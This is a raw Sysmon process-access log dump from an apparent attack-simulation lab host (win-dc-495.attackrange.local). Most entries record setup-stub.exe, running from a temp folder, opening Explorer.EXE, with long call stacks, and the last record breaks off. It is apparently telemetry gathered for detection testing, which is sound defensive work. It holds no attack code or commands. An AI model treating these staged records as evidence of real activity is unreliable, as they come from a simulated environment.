10341000x800000000000000016476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 